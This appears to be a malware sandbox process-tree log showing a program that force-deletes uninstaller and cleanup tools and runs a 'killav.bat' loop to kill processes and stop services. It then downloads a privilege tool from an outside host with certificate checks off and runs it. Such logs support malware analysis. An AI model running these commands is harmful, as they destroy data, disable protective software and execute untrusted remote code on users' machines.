C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
8⤵
- Suspicious use of AdjustPrivilegeToken
PID:4576

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\odt\*Dism++*"
7⤵
PID:3500

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
8⤵
PID:3692

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\odt\*Total*Uninstal*"
7⤵
PID:820

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Program Files\*AUTO*Uninstaller*"
7⤵
PID:3632

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Program Files\msicuu2.*"
7⤵
PID:4936

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
8⤵
PID:4304

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Program Files\msicuu.*"
7⤵
PID:2376

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Program Files\*Easy*remove*"
7⤵
PID:3664

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Program Files\*CCleaner*"
7⤵
PID:1940

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Program Files\*geek*"
7⤵
PID:3876

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Program Files\*cad*uninstall*"
7⤵
PID:1548

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Program Files\*cadallclear*"
7⤵
PID:1708

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Program Files\*iobit*uninstall*"
7⤵
PID:4228

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Program Files\*Dism++*"
7⤵
PID:1276

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Program Files\*Total*Uninstal*"
7⤵
PID:2364

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Program Files (x86)\*AUTO*Uninstaller*"
7⤵
PID:4592

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Program Files (x86)\msicuu2.*"
7⤵
PID:1048

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
8⤵
PID:2676

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Program Files (x86)\msicuu.*"
7⤵
PID:1824

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Program Files (x86)\*Easy*remove*"
7⤵
PID:5100

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
8⤵
PID:2428

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Program Files (x86)\*CCleaner*"
7⤵
PID:3316

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
8⤵
PID:4424

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Program Files (x86)\*geek*"
7⤵
PID:3076

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Program Files (x86)\*cad*uninstall*"
7⤵
PID:1324

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
8⤵
PID:3752

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Program Files (x86)\*cadallclear*"
7⤵
- Suspicious use of AdjustPrivilegeToken
PID:4464

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Program Files (x86)\*iobit*uninstall*"
7⤵
PID:5152

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Program Files (x86)\*Dism++*"
7⤵
PID:5188

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Program Files (x86)\*Total*Uninstal*"
7⤵
PID:5248

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\ProgramData\*AUTO*Uninstaller*"
7⤵
PID:5340

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\ProgramData\msicuu2.*"
7⤵
PID:5372

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\ProgramData\msicuu.*"
7⤵
PID:5408

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\ProgramData\*Easy*remove*"
7⤵
PID:5456

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\ProgramData\*CCleaner*"
7⤵
PID:5480

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\ProgramData\*geek*"
7⤵
PID:5540

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\ProgramData\*cad*uninstall*"
7⤵
PID:5596

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\ProgramData\*cadallclear*"
7⤵
PID:5648

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\ProgramData\*iobit*uninstall*"
7⤵
PID:5720

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\ProgramData\*Dism++*"
7⤵
PID:5768

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\ProgramData\*Total*Uninstal*"
7⤵
PID:5836

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Users\*AUTO*Uninstaller*"
7⤵
PID:5896

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Users\msicuu2.*"
7⤵
PID:5964

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Users\msicuu.*"
7⤵
PID:6016

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Users\*Easy*remove*"
7⤵
PID:6056

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Users\*CCleaner*"
7⤵
PID:6108

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Users\*geek*"
7⤵
PID:3660

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Users\*cad*uninstall*"
7⤵
PID:3868

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Users\*cadallclear*"
7⤵
PID:4048

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Users\*iobit*uninstall*"
7⤵
PID:5264

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Users\*Dism++*"
7⤵
PID:5740

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Users\*Total*Uninstal*"
7⤵
PID:5988

C:\Windows\SYSTEM32\CMD.exe
"CMD" /C DIR /AD /B C:\\*AUTO*Uninstaller*
7⤵
PID:5404

C:\Windows\SYSTEM32\CMD.exe
"CMD" /C DIR /AD /S /B C:\$Recycle.Bin\*AUTO*Uninstaller*
7⤵
PID:2232

C:\Windows\SYSTEM32\CMD.exe
"CMD" /C DIR /AD /S /B C:\Documents and Settings\*AUTO*Uninstaller*
7⤵
PID:5484

C:\Windows\SYSTEM32\CMD.exe
"CMD" /C DIR /AD /S /B C:\odt\*AUTO*Uninstaller*
7⤵
PID:3980

C:\Windows\SYSTEM32\CMD.exe
"CMD" /C DIR /AD /S /B C:\Program Files\*AUTO*Uninstaller*
7⤵
PID:5224

C:\Windows\SYSTEM32\CMD.exe
"CMD" /C DIR /AD /S /B C:\Program Files (x86)\*AUTO*Uninstaller*
7⤵
PID:5144

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
8⤵
PID:5068

C:\Windows\SYSTEM32\CMD.exe
"CMD" /C DIR /AD /S /B C:\ProgramData\*AUTO*Uninstaller*
7⤵
PID:5748

C:\Windows\SYSTEM32\CMD.exe
"CMD" /C DIR /AD /S /B C:\Users\*AUTO*Uninstaller*
7⤵
PID:5500

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C killav.bat
6⤵
PID:2964

C:\Windows\system32\choice.exe
CHOICE /T 1 /D y /n
7⤵
PID:3752

C:\Windows\system32\tasklist.exe
tasklist
7⤵
- Enumerates processes with tasklist
PID:2328

C:\Windows\system32\find.exe
find /i "aioc4.exe"
7⤵
PID:4920

C:\Windows\system32\taskkill.exe
taskkill /im "360bpsvc.exe" /f
7⤵
- Suspicious use of AdjustPrivilegeToken
PID:3356

C:\Windows\system32\taskkill.exe
taskkill /im "360huabao.exe" /f
7⤵
PID:1192

C:\Windows\system32\taskkill.exe
taskkill /im "360wpsrv.exe" /f
7⤵
PID:1140

C:\Windows\system32\taskkill.exe
taskkill /im "ABCtpoprytx.exe" /f
7⤵
- Kills process with taskkill
PID:4356

C:\Windows\system32\taskkill.exe
taskkill /im "AU_CN.exe" /f
7⤵
- Kills process with taskkill
PID:2196

C:\Windows\system32\taskkill.exe
taskkill /im "bqpb.exe" /f
7⤵
PID:2184

C:\Windows\system32\taskkill.exe
taskkill /im "Cleaner One.exe" /f
7⤵
- Kills process with taskkill
PID:2884

C:\Windows\system32\taskkill.exe
taskkill /im "ComputerZService.exe" /f
7⤵
PID:2180

C:\Windows\system32\taskkill.exe
taskkill /im "convHelper.exe" /f
7⤵
- Kills process with taskkill
PID:3172

C:\Windows\system32\taskkill.exe
taskkill /im "convServer.exe" /f
7⤵
- Kills process with taskkill
PID:4072

C:\Windows\system32\taskkill.exe
taskkill /im "convSpeedup.exe" /f
7⤵
- Kills process with taskkill
PID:5260

C:\Windows\system32\taskkill.exe
taskkill /im "Dwight.exe" /f
7⤵
PID:5872

C:\Windows\system32\taskkill.exe
taskkill /im "EasiUpdate3.exe" /f
7⤵
- Kills process with taskkill
PID:2320

C:\Windows\system32\taskkill.exe
taskkill /im "EasiUpdate3Protect.exe" /f
7⤵
- Kills process with taskkill
PID:5412

C:\Windows\system32\taskkill.exe
taskkill /im "ECAgent.exe" /f
7⤵
PID:5148

C:\Windows\system32\taskkill.exe
taskkill /im "escsvc64.exe" /f
7⤵
- Kills process with taskkill
PID:5036

C:\Windows\system32\taskkill.exe
taskkill /im "fastpic.exe" /f
7⤵
PID:5468

C:\Windows\system32\taskkill.exe
taskkill /im "FeiRarNews.exe" /f
7⤵
PID:5832

C:\Windows\system32\taskkill.exe
taskkill /im "fpprotect.exe" /f
7⤵
PID:1648

C:\Windows\system32\taskkill.exe
taskkill /im "FZip.exe" /f
7⤵
PID:1632

C:\Windows\system32\taskkill.exe
taskkill /im "geek.exe" /f
7⤵
PID:5840

C:\Windows\system32\taskkill.exe
taskkill /im "HaloDesktop64.exe" /f
7⤵
PID:5852

C:\Windows\system32\taskkill.exe
taskkill /im "HaloSearch.exe" /f
7⤵
- Kills process with taskkill
PID:5924

C:\Windows\system32\taskkill.exe
taskkill /im "HaloTheme.exe" /f
7⤵
PID:2308

C:\Windows\system32\taskkill.exe
taskkill /im "HaloTray.exe" /f
7⤵
- Kills process with taskkill
PID:5360

C:\Windows\system32\taskkill.exe
taskkill /im "iOSDRServer.exe" /f
7⤵
- Kills process with taskkill
PID:4168

C:\Windows\system32\taskkill.exe
taskkill /im "iOSSU.exe" /f
7⤵
- Kills process with taskkill
PID:4608

C:\Windows\system32\taskkill.exe
taskkill /im "Jsbyptp.exe" /f
7⤵
- Kills process with taskkill
PID:4408

C:\Windows\system32\taskkill.exe
taskkill /im "KGPMService.exe" /f
7⤵
PID:4856

C:\Windows\system32\taskkill.exe
taskkill /im "ktpb.exe" /f
7⤵
- Kills process with taskkill
PID:6128

C:\Windows\system32\taskkill.exe
taskkill /im "kvipgui.exe" /f
7⤵
PID:2932

C:\Windows\system32\taskkill.exe
taskkill /im "kzyptp.exe" /f
7⤵
PID:5328

C:\Windows\system32\taskkill.exe
taskkill /im "kdeskcore.exe" /f
7⤵
PID:4932

C:\Windows\system32\taskkill.exe
taskkill /im "keyemain.exe" /f
7⤵
- Kills process with taskkill
PID:5348

C:\Windows\system32\taskkill.exe
taskkill /im "kwallpaper.exe" /f
7⤵
PID:3364

C:\Windows\system32\taskkill.exe
taskkill /im "kwallpaperex.exe" /f
7⤵
PID:4160

C:\Windows\system32\taskkill.exe
taskkill /im "LDSGameHall.exe" /f
7⤵
- Kills process with taskkill
PID:5432

C:\Windows\system32\taskkill.exe
taskkill /im "LockApp.exe" /f
7⤵
- Kills process with taskkill
PID:5920

C:\Windows\system32\taskkill.exe
taskkill /im "lsmain.exe" /f
7⤵
- Kills process with taskkill
PID:6088

C:\Windows\system32\taskkill.exe
taskkill /im "Margot.exe" /f
7⤵
- Kills process with taskkill
PID:2192

C:\Windows\system32\taskkill.exe
taskkill /im "mctray.exe" /f
7⤵
PID:4220

C:\Windows\system32\taskkill.exe
taskkill /im "MelonTray.exe" /f
7⤵
PID:6044

C:\Windows\system32\taskkill.exe
taskkill /im "pbxhone.exe" /f
7⤵
- Kills process with taskkill
PID:4884

C:\Windows\system32\taskkill.exe
taskkill /im "pdfServer.exe" /f
7⤵
- Kills process with taskkill
PID:2288

C:\Windows\system32\taskkill.exe
taskkill /im "pdfspeedup.exe" /f
7⤵
- Kills process with taskkill
PID:4984

C:\Windows\system32\taskkill.exe
taskkill /im "pdholder.exe" /f
7⤵
- Kills process with taskkill
PID:5300

C:\Windows\system32\taskkill.exe
taskkill /im "QuickSeeTray.exe" /f
7⤵
- Kills process with taskkill
PID:5156

C:\Windows\system32\taskkill.exe
taskkill /im "speedup.exe" /f
7⤵
- Kills process with taskkill
PID:5860

C:\Windows\system32\taskkill.exe
taskkill /im "vip.exe" /f
7⤵
PID:5036

C:\Windows\system32\taskkill.exe
taskkill /im "vrol.exe" /f
7⤵
- Kills process with taskkill
PID:5624

C:\Windows\system32\taskkill.exe
taskkill /im "WpTinyTray.exe" /f
7⤵
PID:5664

C:\Windows\system32\taskkill.exe
taskkill /im "WRSvn.exe" /f
7⤵
PID:5384

C:\Windows\system32\taskkill.exe
taskkill /im "WRtlname.exe" /f
7⤵
PID:4396

C:\Windows\system32\taskkill.exe
taskkill /im "WRUtest.exe" /f
7⤵
- Kills process with taskkill
PID:5908

C:\Windows\system32\sc.exe
sc stop "360bpsvc"
7⤵
- Launches sc.exe
PID:5800

C:\Windows\system32\sc.exe
sc stop "convServer"
7⤵
- Launches sc.exe
PID:5824

C:\Windows\system32\sc.exe
sc stop "EasiUpdate3"
7⤵
- Launches sc.exe
PID:4076

C:\Windows\system32\sc.exe
sc stop "EasiUpdate3Protect"
7⤵
- Launches sc.exe
PID:5780

C:\Windows\system32\sc.exe
sc stop "EasyAntiCheat"
7⤵
- Launches sc.exe
PID:6028

C:\Windows\system32\sc.exe
sc stop "EpsonScanSvc"
7⤵
- Launches sc.exe
PID:5224

C:\Windows\system32\sc.exe
sc stop "FastPDFSvc"
7⤵
- Launches sc.exe
PID:2232

C:\Windows\system32\sc.exe
sc stop "iOSDRServer"
7⤵
- Launches sc.exe
PID:5740

C:\Windows\system32\sc.exe
sc stop "KGPMSYS"
7⤵
- Launches sc.exe
PID:3660

C:\Windows\system32\sc.exe
sc stop "kzipservice"
7⤵
- Launches sc.exe
PID:6016

C:\Windows\system32\sc.exe
sc stop "masterPDF_Server"
7⤵
- Launches sc.exe
PID:5720

C:\Windows\system32\sc.exe
sc stop "QuickSeeSvc"
7⤵
- Launches sc.exe
PID:1260

C:\Windows\system32\sc.exe
sc stop "SangforSP"
7⤵
- Launches sc.exe
PID:5084

C:\Windows\system32\sc.exe
sc stop "VRLService"
7⤵
- Launches sc.exe
PID:1324

C:\Windows\system32\sc.exe
sc stop "WRSvnV1"
7⤵
- Launches sc.exe
PID:3988

C:\Windows\system32\sc.exe
sc stop "wrzipservice"
7⤵
- Launches sc.exe
PID:1532

C:\Windows\system32\choice.exe
CHOICE /T 1 /D y /n
7⤵
PID:1824

C:\Windows\system32\tasklist.exe
tasklist
7⤵
- Enumerates processes with tasklist
PID:2224

C:\Windows\system32\find.exe
find /i "aioc4.exe"
7⤵
PID:4840

C:\Windows\system32\taskkill.exe
taskkill /im "360bpsvc.exe" /f
7⤵
PID:2200

C:\Windows\system32\taskkill.exe
taskkill /im "360huabao.exe" /f
7⤵
- Kills process with taskkill
PID:5004

C:\Windows\system32\taskkill.exe
taskkill /im "360wpsrv.exe" /f
7⤵
PID:864

C:\Windows\system32\taskkill.exe
taskkill /im "ABCtpoprytx.exe" /f
7⤵
- Kills process with taskkill
PID:5760

C:\Windows\system32\taskkill.exe
taskkill /im "AU_CN.exe" /f
7⤵
PID:4340

C:\Windows\system32\taskkill.exe
taskkill /im "bqpb.exe" /f
7⤵
PID:4908

C:\Windows\system32\taskkill.exe
taskkill /im "Cleaner One.exe" /f
7⤵
- Kills process with taskkill
PID:5752

C:\Windows\system32\taskkill.exe
taskkill /im "ComputerZService.exe" /f
7⤵
PID:5216

C:\Windows\system32\taskkill.exe
taskkill /im "convHelper.exe" /f
7⤵
PID:1184

C:\Windows\system32\taskkill.exe
taskkill /im "convServer.exe" /f
7⤵
PID:3272

C:\Windows\system32\taskkill.exe
taskkill /im "convSpeedup.exe" /f
7⤵
- Kills process with taskkill
PID:4760

C:\Windows\system32\taskkill.exe
taskkill /im "Dwight.exe" /f
7⤵
PID:3964

C:\Windows\system32\taskkill.exe
taskkill /im "EasiUpdate3.exe" /f
7⤵
PID:6116

C:\Windows\system32\taskkill.exe
taskkill /im "EasiUpdate3Protect.exe" /f
7⤵
PID:4800

C:\Windows\system32\taskkill.exe
taskkill /im "ECAgent.exe" /f
7⤵
- Kills process with taskkill
PID:4304

C:\Windows\system32\taskkill.exe
taskkill /im "escsvc64.exe" /f
7⤵
- Kills process with taskkill
PID:5936

C:\Windows\system32\taskkill.exe
taskkill /im "fastpic.exe" /f
7⤵
- Kills process with taskkill
PID:5968

C:\Windows\system32\taskkill.exe
taskkill /im "FeiRarNews.exe" /f
7⤵
- Kills process with taskkill
PID:5548

C:\Windows\system32\taskkill.exe
taskkill /im "fpprotect.exe" /f
7⤵
PID:6120

C:\Windows\system32\taskkill.exe
taskkill /im "FZip.exe" /f
7⤵
PID:6092

C:\Windows\system32\taskkill.exe
taskkill /im "geek.exe" /f
7⤵
PID:5392

C:\Windows\system32\taskkill.exe
taskkill /im "HaloDesktop64.exe" /f
7⤵
PID:776

C:\Windows\system32\taskkill.exe
taskkill /im "HaloSearch.exe" /f
7⤵
- Kills process with taskkill
PID:4984

C:\Windows\system32\taskkill.exe
taskkill /im "HaloTheme.exe" /f
7⤵
- Kills process with taskkill
PID:5452

C:\Windows\system32\taskkill.exe
taskkill /im "HaloTray.exe" /f
7⤵
PID:2416

C:\Windows\system32\taskkill.exe
taskkill /im "iOSDRServer.exe" /f
7⤵
- Kills process with taskkill
PID:5336

C:\Windows\system32\taskkill.exe
taskkill /im "iOSSU.exe" /f
7⤵
PID:908

C:\Windows\system32\taskkill.exe
taskkill /im "Jsbyptp.exe" /f
7⤵
PID:5240

C:\Windows\system32\taskkill.exe
taskkill /im "KGPMService.exe" /f
7⤵
PID:4696

C:\Windows\system32\taskkill.exe
taskkill /im "ktpb.exe" /f
7⤵
PID:5440

C:\Windows\system32\taskkill.exe
taskkill /im "kvipgui.exe" /f
7⤵
PID:5068

C:\Windows\system32\taskkill.exe
taskkill /im "kzyptp.exe" /f
7⤵
PID:2268

C:\Windows\system32\taskkill.exe
taskkill /im "kdeskcore.exe" /f
7⤵
- Kills process with taskkill
PID:5448

C:\Windows\system32\taskkill.exe
taskkill /im "keyemain.exe" /f
7⤵
PID:5544

C:\Windows\system32\taskkill.exe
taskkill /im "kwallpaper.exe" /f
7⤵
PID:5928

C:\Windows\system32\taskkill.exe
taskkill /im "kwallpaperex.exe" /f
7⤵
PID:5776

C:\Windows\system32\taskkill.exe
taskkill /im "LDSGameHall.exe" /f
7⤵
- Kills process with taskkill
PID:2412

C:\Windows\system32\taskkill.exe
taskkill /im "LockApp.exe" /f
7⤵
PID:5780

C:\Windows\system32\taskkill.exe
taskkill /im "lsmain.exe" /f
7⤵
- Kills process with taskkill
PID:1364

C:\Windows\system32\taskkill.exe
taskkill /im "Margot.exe" /f
7⤵
PID:5880

C:\Windows\system32\taskkill.exe
taskkill /im "mctray.exe" /f
7⤵
PID:376

C:\Windows\system32\taskkill.exe
taskkill /im "MelonTray.exe" /f
7⤵
PID:3316

C:\Windows\system32\taskkill.exe
taskkill /im "pbxhone.exe" /f
7⤵
- Kills process with taskkill
PID:5188

C:\Windows\system32\taskkill.exe
taskkill /im "pdfServer.exe" /f
7⤵
PID:2364

C:\Windows\system32\taskkill.exe
taskkill /im "pdfspeedup.exe" /f
7⤵
PID:3664

C:\Windows\system32\taskkill.exe
taskkill /im "pdholder.exe" /f
7⤵
PID:3580

C:\Windows\system32\taskkill.exe
taskkill /im "QuickSeeTray.exe" /f
7⤵
PID:4460

C:\Windows\system32\taskkill.exe
taskkill /im "speedup.exe" /f
7⤵
- Kills process with taskkill
PID:2296

C:\Windows\system32\taskkill.exe
taskkill /im "vip.exe" /f
7⤵
PID:2336

C:\Windows\system32\taskkill.exe
taskkill /im "vrol.exe" /f
7⤵
PID:3584

C:\Windows\system32\taskkill.exe
taskkill /im "WpTinyTray.exe" /f
7⤵
PID:4208

C:\Windows\system32\taskkill.exe
taskkill /im "WRSvn.exe" /f
7⤵
- Kills process with taskkill
PID:5416

C:\Windows\system32\taskkill.exe
taskkill /im "WRtlname.exe" /f
7⤵
- Kills process with taskkill
PID:5704

C:\Windows\system32\taskkill.exe
taskkill /im "WRUtest.exe" /f
7⤵
PID:5292

C:\Windows\system32\sc.exe
sc stop "360bpsvc"
7⤵
- Launches sc.exe
PID:3172

C:\Windows\system32\sc.exe
sc stop "convServer"
7⤵
- Launches sc.exe
PID:4916

C:\Windows\system32\sc.exe
sc stop "EasiUpdate3"
7⤵
- Launches sc.exe
PID:5216

C:\Windows\system32\sc.exe
sc stop "EasiUpdate3Protect"
7⤵
- Launches sc.exe
PID:5024

C:\Windows\system32\sc.exe
sc stop "EasyAntiCheat"
7⤵
- Launches sc.exe
PID:1184

C:\Windows\system32\sc.exe
sc stop "EpsonScanSvc"
7⤵
- Launches sc.exe
PID:5280

C:\Windows\system32\sc.exe
sc stop "FastPDFSvc"
7⤵
- Launches sc.exe
PID:5680

C:\Windows\system32\sc.exe
sc stop "iOSDRServer"
7⤵
- Launches sc.exe
PID:1596

C:\Windows\system32\sc.exe
sc stop "KGPMSYS"
7⤵
- Launches sc.exe
PID:5700

C:\Windows\system32\sc.exe
sc stop "kzipservice"
7⤵
- Launches sc.exe
PID:2180

C:\Windows\system32\sc.exe
sc stop "masterPDF_Server"
7⤵
- Launches sc.exe
PID:1172

C:\Windows\system32\sc.exe
sc stop "QuickSeeSvc"
7⤵
- Launches sc.exe
PID:4760

C:\Windows\system32\sc.exe
sc stop "SangforSP"
7⤵
- Launches sc.exe
PID:3160

C:\Windows\system32\sc.exe
sc stop "VRLService"
7⤵
- Launches sc.exe
PID:4992

C:\Windows\system32\sc.exe
sc stop "WRSvnV1"
7⤵
- Launches sc.exe
PID:4164

C:\Windows\system32\sc.exe
sc stop "wrzipservice"
7⤵
- Launches sc.exe
PID:6128

C:\Windows\system32\choice.exe
CHOICE /T 1 /D y /n
7⤵
PID:4520

C:\Windows\system32\tasklist.exe
tasklist
7⤵
- Enumerates processes with tasklist
PID:6072

C:\Windows\system32\find.exe
find /i "aioc4.exe"
7⤵
PID:4192

C:\Windows\system32\taskkill.exe
taskkill /im "360bpsvc.exe" /f
7⤵
- Kills process with taskkill
PID:5432

C:\Windows\system32\taskkill.exe
taskkill /im "360huabao.exe" /f
7⤵
PID:5316

C:\Windows\system32\taskkill.exe
taskkill /im "360wpsrv.exe" /f
7⤵
- Kills process with taskkill
PID:5660

C:\Windows\system32\taskkill.exe
taskkill /im "ABCtpoprytx.exe" /f
7⤵
PID:1176

C:\Windows\system32\taskkill.exe
taskkill /im "AU_CN.exe" /f
7⤵
PID:6084

C:\Windows\system32\taskkill.exe
taskkill /im "bqpb.exe" /f
7⤵
PID:6044

C:\Windows\system32\taskkill.exe
taskkill /im "Cleaner One.exe" /f
7⤵
- Kills process with taskkill
PID:2300

C:\Windows\system32\taskkill.exe
taskkill /im "ComputerZService.exe" /f
7⤵
PID:776

C:\Windows\system32\taskkill.exe
taskkill /im "convHelper.exe" /f
7⤵
PID:4852

C:\Windows\system32\taskkill.exe
taskkill /im "convServer.exe" /f
7⤵
PID:5756

C:\Windows\system32\taskkill.exe
taskkill /im "convSpeedup.exe" /f
7⤵
- Kills process with taskkill
PID:4248

C:\Windows\system32\taskkill.exe
taskkill /im "Dwight.exe" /f
7⤵
PID:5124

C:\Windows\system32\taskkill.exe
taskkill /im "EasiUpdate3.exe" /f
7⤵
- Kills process with taskkill
PID:5864

C:\Windows\system32\taskkill.exe
taskkill /im "EasiUpdate3Protect.exe" /f
7⤵
- Kills process with taskkill
PID:5988

C:\Windows\system32\taskkill.exe
taskkill /im "ECAgent.exe" /f
7⤵
PID:5720

C:\Windows\system32\taskkill.exe
taskkill /im "escsvc64.exe" /f
7⤵
- Kills process with taskkill
PID:4196

C:\Windows\system32\taskkill.exe
taskkill /im "fastpic.exe" /f
7⤵
PID:924

C:\Windows\system32\taskkill.exe
taskkill /im "FeiRarNews.exe" /f
7⤵
- Kills process with taskkill
PID:3724

C:\Windows\system32\taskkill.exe
taskkill /im "fpprotect.exe" /f
7⤵
- Kills process with taskkill
PID:4840

C:\Windows\system32\taskkill.exe
taskkill /im "FZip.exe" /f
7⤵
- Kills process with taskkill
PID:5696

C:\Windows\system32\taskkill.exe
taskkill /im "geek.exe" /f
7⤵
- Kills process with taskkill
PID:488

C:\Windows\system32\taskkill.exe
taskkill /im "HaloDesktop64.exe" /f
7⤵
- Kills process with taskkill
PID:2280

C:\Windows\system32\taskkill.exe
taskkill /im "HaloSearch.exe" /f
7⤵
PID:6076

C:\Windows\system32\taskkill.exe
taskkill /im "HaloTheme.exe" /f
7⤵
- Kills process with taskkill
PID:5132

C:\Windows\system32\taskkill.exe
taskkill /im "HaloTray.exe" /f
7⤵
- Kills process with taskkill
PID:5640

C:\Windows\system32\taskkill.exe
taskkill /im "iOSDRServer.exe" /f
7⤵
PID:1652

C:\Windows\system32\taskkill.exe
taskkill /im "iOSSU.exe" /f
7⤵
- Kills process with taskkill
PID:5140

C:\Windows\system32\taskkill.exe
taskkill /im "Jsbyptp.exe" /f
7⤵
PID:2180

C:\Windows\system32\taskkill.exe
taskkill /im "KGPMService.exe" /f
7⤵
- Kills process with taskkill
PID:2972

C:\Windows\system32\taskkill.exe
taskkill /im "ktpb.exe" /f
7⤵
PID:2156

C:\Windows\system32\taskkill.exe
taskkill /im "kvipgui.exe" /f
7⤵
PID:6064

C:\Windows\system32\taskkill.exe
taskkill /im "kzyptp.exe" /f
7⤵
- Kills process with taskkill
PID:4456

C:\Windows\system32\taskkill.exe
taskkill /im "kdeskcore.exe" /f
7⤵
PID:2384

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C RD /S /Q "C:\ProgramData\J.R.A"
6⤵
PID:2244

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C MD "C:\ProgramData\J.R.A"
6⤵
PID:2056

C:\Program Files\AIOC4\aria2\x64\aria2c.exe
"C:\Program Files\AIOC4\aria2\x64\aria2c.exe" http://www.qbgxl.com/Tools/NSudoLauncher.7z -s 20 -x 10 -d "C:\Program Files\AIOC4\AIOC_Cache\Tools" -o "NSudoLauncher.7z" --check-certificate=false --async-dns=false --async-dns-server=114.114.114.114,61.160.195.64,8.8.8.8
6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1008

C:\Program Files\AIOC4\7-Zip\x64\7z.exe
"C:\Program Files\AIOC4\7-Zip\x64\7z.exe" x "C:\Program Files\AIOC4\AIOC_Cache\Tools\NSudoLauncher.7z" -o"C:\Program Files\AIOC4\AIOC_Cache\Tools\NSudoLauncher" -aoa
6⤵
PID:5304

C:\Program Files\AIOC4\AIOC_Cache\Tools\NSudoLauncher\x64\NSudoLG.exe
